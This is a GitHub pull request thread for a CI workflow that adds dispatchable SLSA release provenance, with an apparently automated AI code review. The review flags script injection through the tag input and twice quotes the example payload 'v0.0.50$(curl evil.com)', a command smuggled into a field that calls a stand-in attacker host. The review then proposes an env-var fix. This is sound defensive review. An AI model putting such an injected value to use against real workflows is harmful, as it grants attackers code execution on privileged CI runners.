ci(slsa): dispatchable release-provenance + upload-tag-name

[blove]

Summary

Makes the SLSA release-provenance flow actually verifiable (Approach 2 — go beyond dawn to score OSSF Signed-Releases).

• Adds workflow_dispatch with a tag input.
• Passes upload-tag-name to the SLSA generator so the *.intoto.jsonl uploads to the named release even when github.ref is a branch (dispatch) — also sidesteps the "release events run the workflow from the tag commit" trap that made the prior fix untestable.
• Builds from the tag's code (checkout ref) so tarballs match what shipped.

After merge: dispatch against v0.0.50 to confirm both jobs succeed and the release gets tarballs + provenance, then it's proven for v0.0.51+.

Test Plan

• CI green
• gh workflow run release-provenance.yml --ref main -f tag=v0.0.50 → build-artifacts + provenance both succeed
• v0.0.50 release gains *.tgz + *.intoto.jsonl; next Scorecard run scores Signed-Releases

🤖 Generated with Claude Code

[vercel]

The latest updates on your projects. Learn more about Vercel for GitHub.

Project	Deployment	Actions	Updated (UTC)
threadplane	Ready	Preview, Comment	Jun 19, 2026 10:03pm

[github-actions]

Automated approval: this PR received an intelligent (AI) code review. See the review comments on this PR.

[github-actions]

Claude finished @blove's task in 1m 37s —— View job

---

Review complete

• Gather context
• Read full workflow file
• Review diff for correctness, security, and best practices
• Post findings

---

Overall: The approach is correct — workflow_dispatch + upload-tag-name is the right way to make SLSA provenance verifiable independent of release event timing, and checkout ref: <tag> ensures tarballs match shipped code. One security issue to fix before merge.

⚠️ Script injection (line 40) — must fix

inputs.tag is interpolated directly into a run: shell command via ${{ }}. Anyone with write access who dispatches with a crafted tag (e.g. v0.0.50$(curl evil.com)) gets arbitrary code execution in a runner that holds contents: write. This is the canonical injection pattern GitHub's hardening guide warns against — especially ironic in a SLSA provenance workflow.

Fix: bind user input to an env var, read it from the env in the shell. See inline comment for a ready-to-apply suggestion. Fix this →

Everything else looks good:

• upload-tag-name: ${{ needs.build-artifacts.outputs.tag }} correctly routes provenance to the named release for dispatch runs.
• checkout ref: ${{ steps.tag.outputs.tag }} is safe (action parameter, not a shell command).
• Pinned action hashes are intact.
• || precedence in GH Actions expressions is correct — empty string is falsy, so dispatch path falls through to inputs.tag as intended.
• contents: write is scoped to build-artifacts only; provenance inherits it via the SLSA generator's reusable workflow, which is appropriate.

[github-actions]

Script injection vulnerability. inputs.tag is user-controlled and is interpolated directly into the shell command via ${{ }}. Anyone with write access who dispatches this workflow with a crafted tag value (e.g. v0.0.50$(curl evil.com)) can execute arbitrary shell commands in the runner — especially problematic given the contents: write permission that follows.

The SLSA hardening guides specifically call this pattern out. Fix by binding user input to an env var and reading it from there:

Suggested change

	run: echo "tag=${{ github.event.release.tag_name || inputs.tag }}" >> "$GITHUB_OUTPUT"
	env:
	RELEASE_TAG: ${{ github.event.release.tag_name }}
	INPUT_TAG: ${{ inputs.tag }}
	run: echo "tag=${RELEASE_TAG:-$INPUT_TAG}" >> "$GITHUB_OUTPUT"

Same issue applies to line 67 where steps.tag.outputs.tag is interpolated into gh release upload "..." — since that output was set from the tainted input, prefer passing it via env var there too:

        env:
          GH_TOKEN: ${{ github.token }}
          TARGET_TAG: ${{ steps.tag.outputs.tag }}
        run: gh release upload "$TARGET_TAG" --clobber -- release-artifacts/*.tgz